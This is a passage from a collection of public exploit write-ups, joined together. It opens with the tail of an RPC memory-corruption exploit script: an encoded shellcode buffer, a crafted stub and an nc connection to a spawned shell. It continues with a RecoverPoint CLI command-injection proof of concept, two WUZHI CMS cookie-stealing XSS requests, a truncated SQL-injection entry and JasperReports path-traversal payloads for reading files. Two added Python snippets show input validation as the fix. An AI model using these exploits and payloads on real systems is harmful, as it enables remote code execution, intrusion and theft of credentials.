buf += "\x5b\xed\x88\x6c\x53\x1c\xd0\xa9\x54\xff\xa7\xc3\xa6"
buf += "\x82\xbf\x10\xd4\x58\x35\x82\x7e\x2a\xed\x6e\x7e\xff"
buf += "\x68\xe5\x8c\xb4\xff\xa1\x90\x4b\xd3\xda\xad\xc0\xd2"
buf += "\x0c\x24\x92\xf0\x88\x6c\x40\x98\x89\xc8\x27\xa5\xc9"
buf += "\xb2\x98\x03\x82\x5f\xcc\x39\xc9\x37\x21\x70\xf1\xc7"
buf += "\x2d\x03\x82\xf5\xf2\xbf\x0c\xb6\x7b\x66\xcb\xb9\x51"
buf += "\xde\x43\x44\x5a\x1f\x4a\x83\x0e\x4f\xe4\x22\x2f\x04"
buf += "\xf4\xcb\xfa\xb1\xfc\x6a\x55\xa4\x01\xcc\x05\x68\xa9"
buf += "\xa5\x4f\x67\x96\xd6\x6f\xad\xbf\x7f\x92\x4e\xae\x23"
buf += "\x1b\xa8\xba\xcb\x4d\x62\x52\x2e\xaa\xbb\xc5\x51\x98"
buf += "\x93\x61\x19\xca\x24\x8e\x9a\xd8\x02\x18\x11\x0f\x97"
buf += "\x39\x26\x1a\xbf\x2e\xb1\xd0\x2e\x1d\x23\xe4\x7a\xf5"
buf += "\xc0\x77\xe1\x05\x8e\x6b\xbe\x52\xc7\x5a\xb7\x36\xf5"
buf += "\xc5\x61\x24\x04\x93\x4a\xec\xd3\x60\x54\xed\x96\xdd"
buf += "\x72\xfd\x6e\xdd\x3e\xa9\x3e\x88\xe8\x07\xf9\x62\x5b"
buf += "\xf1\x53\xd8\x35\x95\x22\x12\x86\xe3\x2a\x7f\x70\x0b"
buf += "\x9a\xd6\xc5\x34\x13\xbf\xc1\x4d\x49\x5f\x2d\x84\xc9"
buf += "\x6f\x64\x84\x78\xf8\x21\x5d\x39\x65\xd2\x88\x7e\x90"
buf += "\x51\x38\xff\x67\x49\x49\xfa\x2c\xcd\xa2\x76\x3c\xb8"
buf += "\xc4\x25\x3d\xe9"

#NDR format
stub = "\x21\x00\x00\x00" #dwPid = PID_IP (IPv4)
stub += "\x10\x27\x00\x00" #dwRoutingPID
stub += "\xa4\x86\x01\x00" #dwMibInEntrySize 
stub += "\x41"*4 #_MIB_OPAQUE_QUERY pointer
stub += "\x04\x00\x00\x00"  #dwVarID (_MIB_OPAQUE_QUERY)
stub += "\x41"*4 #rgdwVarIndex (_MIB_OPAQUE_QUERY)
stub += "\xa4\x86\x01\x00" #dwMibOutEntrySize 
stub += "\xad\x0b\x2d\x06" #dwVarID ECX (CALL off_64389048[ECX*4]) -> p2p JMP EAX #dwVarID (_MIB_OPAQUE_QUERY)
stub +=  "\xd0\xba\x61\x41\x41" + "\x90"*5 + buf + "\x41"*(100000-10-len(buf)) #rgdwVarIndex (_MIB_OPAQUE_QUERY)
stub += "\x04\x00\x00\x00" #dwId (_MIB_OPAQUE_INFO)
stub += "\x41"*4 #ullAlign (_MIB_OPAQUE_INFO)


dce.call(0x1e, stub)   #0x1d MIBEntryGetFirst (other RPC calls are also affected)
print "[-]Exploit sent to target successfully..."

print "Waiting for shell..."
time.sleep(5)
os.system("nc " + target + " 4444")
            
# Exploit Title: EMC RecoverPoint 4.3 - Admin CLI Command Injection
# Version: RecoverPoint prior to 5.1.1; RecoverPoint for VMs prior to 5.0.1.3
# Date: 2018-05-11
# Exploit Author: Paul Taylor
# Github: https://github.com/bao7uo
# Tested on: RecoverPoint for VMs 4.3, RecoverPoint 4.4.SP1.P1
# CVE: CVE-2018-1185
 
1. Description

An OS command injection vulnerability results in code execution as the built-in admin user.

A crafted entry can result in the ability to escape from the restricted admin user's menu driven CLI to a full Linux operating system shell in the context of the admin user. The attack vector is the trap destination (hostname/IP) parameter of the test_snmp function.
 
2. Proof of Concept

RecoverPoint> test_snmp
Enter the trap destination (host name or IP)
 > /dev/null 2>&1 ; bash #
admin@RecoverPoint:/home/kos/cli$ exit
exit
Test completed successfully.
RecoverPoint> 

3. Solution:

Update to the latest version of RecoverPoint.
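The check the advisory describes as missing, as an added example that is not RecoverPoint's code: the trap destination is accepted only as an IP literal or an RFC 1123 hostname, and is then handed to the SNMP tool as one argv element rather than through a shell. Function names are hypothetical; the snmptrap flags are Net-SNMP's, and the trap OID is a constructed placeholder.

```python
import ipaddress
import re
import subprocess

# One RFC 1123 hostname label: letters, digits and hyphens, no leading or
# trailing hyphen, at most 63 characters. No shell metacharacter matches.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


class InvalidDestination(ValueError):
    """Raised when the value is neither an IP literal nor a hostname."""


def validate_trap_destination(value: str) -> str:
    """Return the destination if it is an IP literal or a hostname.

    Whitespace, quotes, ';', '>', '$(' and every other metacharacter fall
    outside both accepted grammars, so the PoC input above is refused.
    """
    value = value.strip()
    if not value or len(value) > 253:
        raise InvalidDestination("empty or too long")
    try:
        return str(ipaddress.ip_address(value))  # IPv4 or IPv6 literal
    except ValueError:
        pass
    labels = value.rstrip(".").split(".")
    if all(_LABEL.match(label) for label in labels):
        return value
    raise InvalidDestination(f"not a hostname or IP literal: {value!r}")


def build_trap_command(destination: str, community: str = "public") -> list:
    """argv for a test trap (Net-SNMP snmptrap syntax; the OID is a placeholder).

    The list form is what matters: each element reaches the program as one
    literal argument and is never interpreted as shell syntax.
    """
    dest = validate_trap_destination(destination)
    return ["snmptrap", "-v", "2c", "-c", community, dest, "", "1.3.6.1.4.1.99999.0.1"]


def run_trap_test(destination: str) -> int:
    """Send the test trap without a shell and return the exit status."""
    argv = build_trap_command(destination)
    return subprocess.run(argv, shell=False, check=False).returncode


if __name__ == "__main__":
    for candidate in ("10.0.0.5", "snmp-trap.example.com", "/dev/null 2>&1 ; bash #"):
        try:
            print(candidate, "->", build_trap_command(candidate))
        except InvalidDestination as exc:
            print(candidate, "-> rejected:", exc)
```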
            
# Exploit Title: WUZHI CMS 4.1.0 XSS Vulnerability
# Date: 2018-4-23
# Exploit Author: jiguang (s1@jiguang.in)
# Vendor Homepage: https://github.com/wuzhicms/wuzhicms
# Software Link: https://github.com/wuzhicms/wuzhicms
# Version: 4.1.0
# CVE: CVE-2018-10311

An issue was discovered in WUZHI CMS 4.1.0 (https://github.com/wuzhicms/wuzhicms/issues/131).
There is an XSS vulnerability, usable for stealing the administrator cookie, phishing attacks, etc., via the tag[pinyin] parameter POSTed to /index.php?m=tags&f=index&v=add&&_su=wuzhicms&_menuid=?&_submenuid=?


POST /www/index.php?m=tags&f=index&v=add&&_su=wuzhicms&_menuid=95&_submenuid=101 HTTP/1.1
 Host: localhost
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
 Accept-Encoding: gzip, deflate
 Referer: http://localhost/www/index.php?m=tags&f=index&v=add&&_su=wuzhicms&_menuid=95&_submenuid=101
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 270
 Cookie: PHPSESSID=uk4g8bm4l96iv5rl6ej2re83a3;  EkT_uid=c%2FzWH2EByNj%2Fm78WencnAg%3D%3D;  EkT_username=oR5iColhZ3j6z343ib%2B9Lg%3D%3D;  EkT_wz_name=LVeemy520l5DQnc4SQGtsw%3D%3D;  EkT_siteid=Wl70z0XOgxO6TVPS70twsg%3D%3D;  EkT_qkey=jiPLTZIrWUySV8FmwZwibPjlIPfq0nTj
 Connection: close
 Upgrade-Insecure-Requests: 1
 
tag%5Btag%5D=jiguang&tag%5Btitle%5D=jiguang&tag%5Bkeyword%5D=jiguang&tag%5Bdesc%5D=jiguang&tag%5Bisshow%5D=1&tag%5Blinkageid%5D=0&LK2_1=0&##  tag%5Bpinyin%5D=ji%3Cimg%2Fsrc%3D1+onerror%3Dalert%28document.cookie%29%3E&tag%5Bletter%5D=&tag%5Burl%5D=&submit=%E6%8F%90+%E4%BA%A4

------------------
            
# Exploit Title: WUZHI CMS 4.1.0 XSS Vulnerability
# Date: 2018-4-23
# Exploit Author: jiguang (s1@jiguang.in)
# Vendor Homepage: https://github.com/wuzhicms/wuzhicms
# Software Link: https://github.com/wuzhicms/wuzhicms
# Version: 4.1.0
# CVE: CVE-2018-10313

An issue was discovered in WUZHI CMS 4.1.0 (https://github.com/wuzhicms/wuzhicms/issues/133).
There is an XSS vulnerability, usable for stealing the administrator cookie, phishing attacks, etc., via the form%5Bqq_10%5D parameter POSTed to /index.php?m=member&f=index&v=profile&set_iframe=1

`POST /wuzhi/www/index.php?m=member&f=index&v=profile&set_iframe=1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://localhost/wuzhi/www/index.php?m=member&f=index&v=profile&set_iframe=1 Content-Type: application/x-www-form-urlencoded Content-Length: 74 Cookie: PHPSESSID=uk4g8bm4l96iv5rl6ej2re83a3; EkT_siteid=Wl70z0XOgxO6TVPS70twsg%3D%3D; EkT_qkey=jiPLTZIrWUySV8FmwZwibPjlIPfq0nTj; EkT_userkeys=e7%2FCIDS8IFYxTUG8kAb7Ww%3D%3D; EkT_truename=yuduo; EkT_auth=lwMUjMOtAXpsQyZViV3zkNdoXMK7Up5NWRRI4Ro4FDKECQHhZ1ntK0WcBotqHVYyx3z9AYABYpAsEx4OdqcExF5S1d7Gw31AvtN07WdqMw28yLCoyNv8RA%3D%3D; EkT__uid=ocqUyYLd7bm05%2Ft4KcS%2B6Q%3D%3D; EkT__username=URDJ1YisL%2BXkt7Mzgg3aNA%3D%3D; EkT__groupid=aZR0cJTYiMBkLfoq8PwJ0g%3D%3D; EkT_modelid=10; tFf_uid=ej6BNn7ulZVYfrHwlgXMvg%3D%3D; tFf_username=YuhCykTKqrPt5fHl2zROVg%3D%3D; tFf_wz_name=IAFonn80xi%2FUvXNXx8uR%2FQ%3D%3D; tFf_siteid=dUi1cO%2FrqMr0atgyt9b%2BNw%3D%3D; tFf_auth=EVUCupGrAYuOzHKFNYqbS%2B39rd2Ynyn74kyNU3KlUwiQCJGQMAgEMU0go7SqkJsUA8kNZq6BsF5nFNbEeL5ehNOQ5DkCGZ4h4JnRqFB8UFIh9kWHsJe84Q%3D%3D; tFf__uid=FM0wd0X5ONWZsKHK8N3j%2Fw%3D%3D; tFf__username=haycqodNzDQbfpqnsWY3xA%3D%3D; tFf__groupid=I7EFExZnf2tvQCMhDV%2B1nA%3D%3D; tFf_truename=yuduo; tFf_modelid=10; SwW_uid=Bk1YojgAB4vSAv%2BmPy3WYg%3D%3D; SwW_username=BTEh6yj6GaEMdyByi0JOZw%3D%3D; SwW_wz_name=8vypKiZ6Ck1JQloRN3gGZQ%3D%3D; SwW_siteid=jm2uH%2FJAmU8uh1X4AlQ1nQ%3D%3D; SwW_qkey=sSAglhFB%2F04GAI1A3H4vDpnfBjktIjQO; SwW_truename=yuyuyu; SwW_auth=qVG8d0BqbIYaHf7emEsG%2Bz%2Fo4LTxYomIRzLjUyu1wWd0BfW4Eucw1UXVm3OTEBexHDGzzwvYarSW62r%2F%2BZrP6RZloFSgyn1%2B5QSsfVv8XDbbIN5Wzd32rQ%3D%3D; SwW__uid=SQgSrskOQqPeThE7vxpQuQ%3D%3D; SwW__username=ZnY2K%2B8IB6WgdsrHTD%2F%2Fzg%3D%3D; SwW__groupid=wVnor3QYe03CC%2B9JInwPIQ%3D%3D; SwW_modelid=10 
Connection: close Upgrade-Insecure-Requests: 1

form%5Bqq_10%5D=234234" onmouseover="confirm(22)&submit=%E6%8F%90%E4%BA%A4

------------------
            
# Exploit Title: XATABoost CMS Sql Injection
# Google Dork: inurl:php?id= Powered by XATABOOST
# Date: 02.01.2018
# Exploit Author: MgThuraMoeMyint
# Vendor Homepage: http://www2.xataboost.com
# Version: 1.0.0
# Tested on: Kali Linux
# SQL Injection Type: Union Based
# Example URL: http://localhost/news.php?id=[Injection Point]

GET /xata/nonprofit/000026/css/custom.css.php?x=1c383cd30b7c298ab50293adfecb7b18 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/news.php?id=[Injection Point]
            
TIBCO’s JasperReports (<=6.2.4, 6.3.0, 6.3.2-3, 6.4.0, 6.4.2, CE/ActiveMatrix BPM and Jaspersoft AWS with Multi-Tenancy/Reporting and Analytics for AWS <=6.4.2) is vulnerable to an authenticated file read and inclusion vulnerability by means of directory traversal. It is possible for an attacker, regardless of user permissions, to access or include files from within the filesystem hosting the application.

CVSS v3 Base Score: 7.7 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N)

- - -

## Bypassing JasperReports Access Controls
The following example allowed us to include an administrator JSP as a low-privileged user (joeuser):

/jasperserver/flow.html?_flowId=sampleFlow&page=../../../jsp/modules/administer/adminImport

Which took us from:

getAttribute() @ HttpServletRequestParameterMap.java:57
> string[] = wrapper.getParameterValues("page")

To:

getResource() @ DirResourceSet.java:101
> file = new File(/home/rhino/jasperreports...mcat/webapps/jasperserver,"/WEB-INF/jsp/modules/administer/adminImport.jsp")

Due to a lack of input validation we found ourselves able to traverse paths to a destination of our choice. Below you will find more Proof of Concepts (PoCs) of the attack in question:

## Accessing Administrator Export Functions

/jasperserver-pro/___________?{param}=..

## Accessing AWS Configuration Functions
/jasperserver-pro/flow.html?_flowId=sampleFlow&page=../../../jsp/modules/administer/awsConfiguration

The above issue allowed us to load privileged portions of the application geared towards the Administrator, thus bypassing access controls.

## Local File Read

The following request allowed us to read configuration files on the server, taking advantage of the unsanitized 'page' parameter. An attacker would use the credentials found there to pivot further across applications and services. Although the above screenshot shows a randomly generated password for the occasion, we decided to blur it out of habit.

/jasperserver-pro/flow.html?_flowId=sampleFlow&page=../../../js.jdbc.properties;

## Local File Inclusion (JSP)

And in a post-intrusion scenario, an attacker would need to upload an arbitrary JSP file, masqueraded as a regular file (sans .jsp), to the victim's filesystem and execute something like the following via local file inclusion:

/jasperserver-pro/flow.html?_flowId=sampleFlow&page=../../../jsp/modules/administer/file;
NOTE: Since the application appends '.jsp' to the 'page' parameter value, you would normally end up with ../../../jsp/modules/administer/file.jsp. However, to read configuration files we need to make Java read the file we want and ignore the '.jsp' addition. NULL bytes (%00) do not work, but we were able to bypass the problem by appending a semicolon to the desired file name.
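The 'page' handling described above, as an added example that is not JasperReports' code: a naive resolver reproducing the append-'.jsp'-and-join behaviour the advisory describes, beside a hardened one that accepts only a bare page identifier. The module root and flow directory are hypothetical; the traversal inputs are the advisory's own.

```python
import posixpath
import re

# Hypothetical layout: a flow's pages live under <root>/<flow>/<page>.jsp.
JSP_ROOT = "/WEB-INF/jsp/modules"
_IDENTIFIER = re.compile(r"^[A-Za-z0-9_]+$")


class PageRejected(ValueError):
    """Raised when a 'page' value is not a bare page identifier."""


def resolve_page_naive(flow: str, page: str) -> str:
    """The pattern the advisory describes: append '.jsp', join, normalise.

    Kept only for contrast: '../' segments climb out of the flow directory,
    and per the advisory a trailing ';' makes the appended '.jsp' ignored.
    """
    return posixpath.normpath(posixpath.join(JSP_ROOT, flow, page + ".jsp"))


def resolve_page(flow: str, page: str) -> str:
    """Hardened mapping: both names must be bare identifiers.

    That one rule refuses '/', '.', ';' and '%', so the administrator-JSP
    traversal, the properties-file read and the ';' suffix trick are all
    rejected before any filesystem lookup. The containment check after
    normalisation is a second, independent guard.
    """
    for name in (flow, page):
        if not _IDENTIFIER.match(name):
            raise PageRejected(f"not a page identifier: {name!r}")
    path = posixpath.normpath(posixpath.join(JSP_ROOT, flow, page + ".jsp"))
    if not path.startswith(JSP_ROOT + "/"):
        raise PageRejected(f"resolved outside the JSP root: {path}")
    return path


if __name__ == "__main__":
    poc = "../../../jsp/modules/administer/adminImport"
    print("naive   :", resolve_page_naive("sampleFlow", poc))
    try:
        resolve_page("sampleFlow", poc)
    except PageRejected as exc:
        print("hardened:", exc)
```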